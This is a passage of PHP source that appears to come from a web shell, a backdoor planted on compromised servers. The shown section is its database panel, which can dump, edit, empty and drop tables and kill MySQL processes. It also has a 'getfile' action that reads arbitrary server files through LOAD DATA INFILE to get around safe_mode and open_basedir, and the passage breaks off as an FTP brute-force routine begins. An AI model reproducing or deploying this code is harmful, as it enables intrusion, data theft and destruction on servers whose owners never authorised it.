  1014.      echo "<form method=\"POST\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>";
  1015.      echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>";
  1016.      $v = join (";",$dmptbls);
  1017.      echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>";
  1018.      if ($dump_file) {$tmp = $dump_file;}
  1019.      else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
  1020.      echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>";
  1021.      echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>";
  1022.      echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>";
  1023.      echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty";
  1024.      echo "</form>";
  1025.     }
  1026.     else
  1027.     {
  1028.      $diplay = TRUE;
  1029.      $set = array();
  1030.      $set["sock"] = $sql_sock;
  1031.      $set["db"] = $sql_db;
  1032.      $dump_out = "download";
  1033.      $set["print"] = 0;
  1034.      $set["nl2br"] = 0;
  1035.      $set[""] = 0;
  1036.      $set["file"] = $dump_file;
  1037.      $set["add_drop"] = TRUE;
  1038.      $set["onlytabs"] = array();
  1039.      if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
  1040.      $ret = mysql_dump($set);
  1041.      if ($sql_dump_download)
  1042.      {
  1043.       @ob_clean();
  1044.       header("Content-type: application/octet-stream");
  1045.       header("Content-length: ".strlen($ret));
  1046.       header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";");
  1047.       echo $ret;
  1048.       exit;
  1049.      }
  1050.      elseif ($sql_dump_savetofile)
  1051.      {
  1052.       $fp = fopen($sql_dump_file,"w");
  1053.       if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";}
  1054.       else
  1055.       {
  1056.        fwrite($fp,$ret);
  1057.        fclose($fp);
  1058.        echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>.";
  1059.       }
  1060.      }
  1061.      else {echo "<b>Dump: nothing to do!</b>";}
  1062.     }
  1063.    }
  1064.    if ($diplay)
  1065.    {
  1066.     if (!empty($sql_tbl))
  1067.     {
  1068.      if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
  1069.      $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
  1070.      $count_row = mysql_fetch_array($count);
  1071.      mysql_free_result($count);
  1072.      $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
  1073.      $tbl_struct_fields = array();
  1074.      while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
  1075.      if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
  1076.      if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
  1077.      if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
  1078.      if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
  1079.      $perpage = $sql_tbl_le - $sql_tbl_ls;
  1080.      if (!is_numeric($perpage)) {$perpage = 10;}
  1081.      $numpages = $count_row[0]/$perpage;
  1082.      $e = explode(" ",$sql_order);
  1083.      if (count($e) == 2)
  1084.      {
  1085.       if ($e[0] == "d") {$asc_desc = "DESC";}
  1086.       else {$asc_desc = "ASC";}
  1087.       $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
  1088.      }
  1089.      else {$v = "";}
  1090.      $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
  1091.      $result = mysql_query($query) or print(mysql_smarterror());
  1092.      echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
  1093.      echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_act.value='structure';document.sql.submit();\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
  1094.      echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_act.value='browse';document.sql.submit();\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
  1095.      echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_act.value='tbldump';document.sql.thistbl.value='1';document.sql.submit();\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
  1096.      echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_act.value='insert';document.sql.thistbl.value='1';document.sql.submit();\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
  1097.      if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
  1098.      if ($sql_tbl_act == "insert")
  1099.      {
  1100.       if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
  1101.       if (!empty($sql_tbl_insert_radio))
  1102.       {
  1103.  
  1104.       }
  1105.       else
  1106.       {
  1107.        echo "<br><br><b>Inserting row into table:</b><br>";
  1108.        if (!empty($sql_tbl_insert_q))
  1109.        {
  1110.         $sql_query = "SELECT * FROM `".$sql_tbl."`";
  1111.         $sql_query .= " WHERE".$sql_tbl_insert_q;
  1112.         $sql_query .= " LIMIT 1;";
  1113.         $sql_query = urldecode($sql_query);
  1114.         $sql_tbl_insert_q = urldecode($sql_tbl_insert_q);
  1115.         $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
  1116.         $values = mysql_fetch_assoc($result);
  1117.         mysql_free_result($result);
  1118.        }
  1119.        else {$values = array();}
  1120.        echo "<form method=\"POST\"><input type=hidden name='sql_tbl_act' value='insert'><input type=hidden name='sql_tbl_insert_q' value='".urlencode($sql_tbl_insert_q)."'><input type=hidden name='sql_tbl_ls' value='".$sql_tbl_ls."'><input type=hidden name='sql_tbl_le' value='".$sql_tbl_le."'><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"act\" value=\"sql\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
  1121.  
  1122.        foreach ($tbl_struct_fields as $field)
  1123.        {
  1124.         $name = $field["Field"];
  1125.         if (empty($sql_tbl_insert_q)) {$v = "";}
  1126.         echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
  1127.         $i++;
  1128.        }
  1129.        echo "</table><br>";
  1130.        echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
  1131.        if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
  1132.        echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
  1133.       }
  1134.      }
  1135.      if ($sql_tbl_act == "browse")
  1136.      {
  1137.       $sql_tbl_ls = abs($sql_tbl_ls);
  1138.       $sql_tbl_le = abs($sql_tbl_le);
  1139.       echo "<hr size=\"1\" noshade>";
  1140.       $b = 0;
  1141.       for($i=0;$i<$numpages;$i++)
  1142.       {
  1143.        if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.thistbl.value='1';document.sql.sql_order.value='".htmlspecialchars($sql_order)."';document.sql.sql_tbl_ls.value='".($i*$perpage)."';document.sql.sql_tbl_le.value='".($i*$perpage+$perpage)."';document.sql.submit();\"><u>";}
  1144.        echo $i;
  1145.        if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
  1146.        if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
  1147.        else {echo "&nbsp;";}
  1148.       }
  1149.       if ($i == 0) {echo "empty";}
  1150.       echo "<form method=\"POST\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
  1151.       echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>";
  1152.       echo "<tr>";
  1153.       echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
  1154.       for ($i=0;$i<mysql_num_fields($result);$i++)
  1155.       {
  1156.        $v = mysql_field_name($result,$i);
  1157.        if ($e[0] == "a") {$s = "d"; $m = "asc";}
  1158.        else {$s = "a"; $m = "desc";}
  1159.        echo "<td>";
  1160.        if (empty($e[0])) {$e[0] = "a";}
  1161.        if ($e[1] != $v) {$sql_order="";$sql_order=$e[0]." ".$v;echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_order.value='".$sql_order."';document.sql.sql_tbl_ls.value='".$sql_tbl_ls."';document.sql.sql_tbl_le.value='".$sql_tbl_le."';document.sql.submit();\"><b>".$v."</b></a>";}
  1162.        else {echo "<b>".$v."</b> <a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_order.value='".$s."%20".$v."';document.sql.sql_tbl_ls.value='".$sql_tbl_ls."';document.sql.sql_tbl_le.value='".$sql_tbl_le."';document.sql.submit();\"><font color=red>\/</font></a>";}
  1163.        echo "</td>";
  1164.       }
  1165.       echo "<td><font color=\"green\"><b>Action</b></font></td>";
  1166.       echo "</tr>";
  1167.       while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
  1168.       {
  1169.        echo "<tr>";
  1170.        $w = "";
  1171.        $i = 0;
  1172.        foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
  1173.        if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
  1174.        echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
  1175.        $i = 0;
  1176.        foreach ($row as $k=>$v)
  1177.        {
  1178.         $v = htmlspecialchars($v);
  1179.         if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
  1180.         echo "<td>".$v."</td>";
  1181.         $i++;
  1182.        }
  1183.        echo "<td>";
  1184.        echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_act.value='query';document.sql.sql_query.value='".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_ls.value='".$sql_tbl_ls."';document.sql.sql_tbl_le.value='".$sql_tbl_le."';document.sql.submit();\"><b>DEL</b></a>&nbsp;";
  1185.        echo "<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl_act.value='insert';document.sql.sql_tbl_insert_q.value='".urlencode($w)."';document.sql.sql_tbl.value='".urlencode($sql_tbl)."';document.sql.sql_tbl_ls.value='".$sql_tbl_ls."';document.sql.sql_tbl_le.value='".$sql_tbl_le."';document.sql.submit();\"><b>EDIT</b></a>&nbsp;";
  1186.        echo "</td>";
  1187.        echo "</tr>";
  1188.       }
  1189.       mysql_free_result($result);
  1190.       echo "</table><hr size=\"1\" noshade><p align=\"left\"><select name=\"sql_act\">";
  1191.       echo "<option value=\"\">With selected:</option>";
  1192.       echo "<option value=\"deleterow\">Delete</option>";
  1193.       echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
  1194.      }
  1195.     }
  1196.     else
  1197.     {
  1198.      $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
  1199.      if (!$result) {echo mysql_smarterror();}
  1200.      else
  1201.      {
  1202.       echo "<br><form method=\"POST\"><input name='act' type='hidden' value='sql'><input name='sql_login' type='hidden' value='".$sql_login."'><input name='sql_server' type='hidden' value='".$sql_server."'><input name='sql_port' type='hidden' value='".$sql_port."'><input name='sql_db' type='hidden' value='".$sql_db."'><input name='sql_passwd' type='hidden' value='".$sql_passwd."'><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
  1203.       $i = 0;
  1204.       $tsize = $trows = 0;
  1205.       while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
  1206.       {
  1207.        $tsize += $row["Data_length"];
  1208.        $trows += $row["Rows"];
  1209.        $size = view_size($row["Data_length"]);
  1210.        echo "<tr>";
  1211.        echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
  1212.  
  1213.        echo "<td>&nbsp;<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.sql_tbl.value='".urlencode($row["Name"])."';document.sql.submit();\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
  1214.        echo "<td>".$row["Rows"]."</td>";
  1215.        echo "<td>".$row["Type"]."</td>";
  1216.        echo "<td>".$row["Create_time"]."</td>";
  1217.        echo "<td>".$row["Update_time"]."</td>";
  1218.        echo "<td>".$size."</td>";
  1219.  
  1220.        echo "<td>&nbsp;<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_act.value='query';document.sql.sql_query.value='".urlencode("DELETE FROM `".$row["Name"]."`")."';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.submit();\"><b>EMPT</b></a>&nbsp;&nbsp;<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_act.value='query';document.sql.sql_query.value='".urlencode("DROP TABLE `".$row["Name"]."`")."';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.submit();\"><b>DROP</b></a>&nbsp;<a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_tbl.value='".$row["Name"]."';document.sql.sql_tbl_act.value='insert';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_db.value='".urlencode($sql_db)."';document.sql.submit();\"><b>INS</b></a>&nbsp;</td>";
  1221.        echo "</tr>";
  1222.        $i++;
  1223.       }
  1224.       echo "<tr bgcolor=\"000000\">";
  1225.       echo "<td><center><b>»</b></center></td>";
  1226.       echo "<td><center><b>".$i." table(s)</b></center></td>";
  1227.       echo "<td><b>".$trows."</b></td>";
  1228.       echo "<td>".$row[1]."</td>";
  1229.       echo "<td>".$row[10]."</td>";
  1230.       echo "<td>".$row[11]."</td>";
  1231.       echo "<td><b>".view_size($tsize)."</b></td>";
  1232.       echo "<td></td>";
  1233.       echo "</tr>";
  1234.       echo "</table><hr size=\"1\" noshade><p align=\"right\"><select name=\"sql_act\">";
  1235.       echo "<option value=\"\">With selected:</option>";
  1236.       echo "<option value=\"tbldrop\">Drop</option>";
  1237.       echo "<option value=\"tblempty\">Empty</option>";
  1238.       echo "<option value=\"tbldump\">Dump</option>";
  1239.       echo "<option value=\"tblcheck\">Check table</option>";
  1240.       echo "<option value=\"tbloptimize\">Optimize table</option>";
  1241.       echo "<option value=\"tblrepair\">Repair table</option>";
  1242.       echo "<option value=\"tblanalyze\">Analyze table</option>";
  1243.       echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
  1244.       mysql_free_result($result);
  1245.      }
  1246.     }
  1247.    }
  1248.    }
  1249.   }
  1250.   else
  1251.   {
  1252.    $acts = array("","newdb","serverstatus","servervars","processes","getfile");
  1253.    if (in_array($sql_act,$acts)) { <table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login);  "><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd);  "><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server);  "><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port);  "><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form method="POST"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login);  "><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd);  "><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server);  "><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port);  "><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile);  ">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
  1254.    if (!empty($sql_act))
  1255.    {
  1256.     echo "<hr size=\"1\" noshade>";
  1257.     if ($sql_act == "newdb")
  1258.     {
  1259.      echo "<b>";
  1260.      if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
  1261.      else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
  1262.     }
  1263.     if ($sql_act == "serverstatus")
  1264.     {
  1265.      $result = mysql_query("SHOW STATUS", $sql_sock);
  1266.      echo "<center><b>Server-status variables:</b><br><br>";
  1267.      echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
  1268.      while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
  1269.      echo "</table></center>";
  1270.      mysql_free_result($result);
  1271.     }
  1272.     if ($sql_act == "servervars")
  1273.     {
  1274.      $result = mysql_query("SHOW VARIABLES", $sql_sock);
  1275.      echo "<center><b>Server variables:</b><br><br>";
  1276.      echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
  1277.      while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
  1278.      echo "</table>";
  1279.      mysql_free_result($result);
  1280.     }
  1281.     if ($sql_act == "processes")
  1282.     {
  1283.      if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
  1284.      $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
  1285.      echo "<center><b>Processes:</b><br><br>";
  1286.      echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
  1287.      while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"#\" onclick=\"document.sql.act.value='sql';document.sql.sql_login.value='".htmlspecialchars($sql_login)."';document.sql.sql_passwd.value='".htmlspecialchars($sql_passwd)."';document.sql.sql_server.value='".htmlspecialchars($sql_server)."';document.sql.sql_port.value='".htmlspecialchars($sql_port)."';document.sql.sql_act.value='processes';document.sql.kill.value='".$row[0]."';document.sql.submit();\"><u>Kill</u></a></td></tr>";}
  1288.      echo "</table>";
  1289.      mysql_free_result($result);
  1290.     }
  1291.     if ($sql_act == "getfile")
  1292.     {
  1293.      $tmpdb = $sql_login."_tmpdb";
  1294.      $select = mysql_select_db($tmpdb);
  1295.      if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
  1296.      if ($select)
  1297.      {
  1298.       $created = FALSE;
  1299.       mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
  1300.       mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
  1301.       $result = mysql_query("SELECT * FROM tmp_file;");
  1302.       if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
  1303.       else
  1304.       {
  1305.        for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
  1306.        $f = "";
  1307.        while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
  1308.        if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
  1309.        else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
  1310.        mysql_free_result($result);
  1311.        mysql_query("DROP TABLE tmp_file;");
  1312.       }
  1313.      }
  1314.      mysql_drop_db($tmpdb); //comment it if you want to leave database
  1315.     }
  1316.    }
  1317.   }
  1318.  }
  1319.  echo "</td></tr></table>";
  1320.  if ($sql_sock)
  1321.  {
  1322.   $affected = @mysql_affected_rows($sql_sock);
  1323.   if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
  1324.   echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
  1325.  }
  1326.  echo "</table>";
  1327. }
  1328. if ($act == "mkdir")
  1329. {
  1330.  if ($mkdir != $d)
  1331.  {
  1332.   if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
  1333.   elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
  1334.   echo "<br><br>";
  1335.  }
  1336.  $act = $dspact = "ls";
  1337. }
  1338. if ($act == "ftpquickbrute")
  1339. {
  1340.  echo "<b>Ftp Quick brute:</b><br>";
  1341.  if (!win) {echo "This functions not work in Windows!<br><br>";}
  1342.  else
  1343.  {
